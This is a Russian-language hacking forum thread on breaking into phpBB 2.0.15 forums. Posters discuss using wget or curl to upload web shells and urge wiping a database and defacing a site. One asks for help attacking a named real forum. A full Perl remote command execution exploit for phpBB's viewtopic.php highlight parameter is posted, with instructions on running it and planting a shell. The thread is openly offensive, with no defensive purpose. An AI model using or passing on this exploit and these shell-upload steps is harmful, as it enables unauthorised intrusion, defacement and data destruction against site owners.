Форумы Уязвимости форумов phpbb 2.0.15

>>Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
а зачем гуид?пишешь wget ili curl ili fetch ili lynx и смотришь какая сработает..

 

exbb прочитал =) идиоты ... а ты возьми грохни базу..задефейсни на фиг..че ты еще оправдывашься перед ними

 

да не хочу просто уже связыватся пусть кто другой тренируется

 

Глупость однако.

which wget
which curl
which lynx
which fetch

wget --help
curl --help
lynx --help
fetch --help

Вот тебе и все параметры.

 

Как мне поменять права доступа.
Закачиваю шелл wget'ом и нихрена.

 

Согласен=)ступил)))))))

командой chmod

 

такой вопросик где мона скачать эксплоит для phpbb 2.0.15

 

Помогите пожалуйста ламеру
Второй день пытаюсь ломануть http://mariel.ru/forum Через кук не получается, внизу
сылка на админку есть, а ник админа не уводится. На форуме 3 админа.

 

m0nzt3r, Нужно цифрами вводить права доступа?
TIMaN, А я вобще этого сайта не вижу.

 

stalles, Я юзаю такой.

Code:

#!/usr/bin/perl 
# Wed Jun 29 19:08:04 CEST 2005 [email protected] 
# 
# phpBB 2.0.15 -re-bug in viewtopic.php 
# The complete Open Source Development with CVS: GNU General Public License 
# Book on using CVS effectively  <---------  cvs, is also GPL 
# or http://www.google.es/search?q=programming+howto 
# 
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK! 
# 
# 
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1 
# You can start typing commands. 
# Tested in BSD. Theo.. it works! 
# 
# !dSR: que todos los hackers digan YO!! 
# 
# 
  

use strict; 
use IO::Socket; 

unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); } 

$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!; 
my ($server, $port) = split (/:/,$1); 
$port   = 80 unless defined($port); 
$server  = $1 unless defined($server); 
my ($url, $command) = $2; 

print "$server - $port - $url\n"; 

while () { 
      print "phpBB2.0.15> "; 
      while(<STDIN>) { 
            $command=$_; 
            chomp($command); 
            last; 
      } 
      &send($command); 
} 

sub send { 
    my $ok   =   0; 
    my $cmd   = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\""; 
    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n". 
               "Host: $server\nPHP: $cmd\n\n\n\n"; 
    my $socket = IO::Socket::INET->new(PeerAddr => $server, 
            PeerPort => $port, 
            Proto    => "tcp", 
            Type     => SOCK_STREAM) 
            or die "can't connect to: $server : $@\n"; 
   print $socket $string; 
   while(<$socket>) { 
      if (/#PHPBBEXPLOIT#/) { 
            close($socket) and last if $ok eq 2; 
            $ok++; 
            next; 
      } 
      print if $ok eq "1"; 
   } 
}

 

и чё с этим кодом делать? его нада компелить? видь на перле некомпелится!

 

молица на этот код надо. писец =))
береш... копируеш... сохроняешь файл в *.pl...
в cmd пишеш путь к нему... путь к форуму... с топиком... например

дальше делаеш то что надо на сервере. можеш шел закачать для удобсва...
да, прежде чем делать, активперл установи -)

 

да , надо

 

Люди, как ломать форум на движке PHPbb ??? То что эксплойта там не надо я уже понял... Де можно взять программу PHPbb??? Спасибо.

 

Извиняюсь, неправильно сылку написал
http://www.mariel.ru/forum/

 

самы ломаемый форум это пхпбб а ты спрашиваешь как =))))))))))))))))))

 

мне кажеца надо модерам удялть сообщения, по типу таких, как пишет тиман. а обычным юзверям игнорировать их. если людям влом тему прочитать, то это уже их проблемы.

 

Я научился ломать форумы эксплойерам, теперь хочу познать искуство взлома форумов на движке РНРbb. Мне нужна помощ. Кто нибудь поможет? Научит? А я пока пойду видео качну. Объясните если не жалко.

 

задрал уже...

 

Но Феар по любому все ломают эксплойерами))
а так вручную хочешь?иди на секлаб поиск пхпбб ... еще вот Задохлик недавно хсс опубликовал...вот это можно вручную а не эксплойерами))))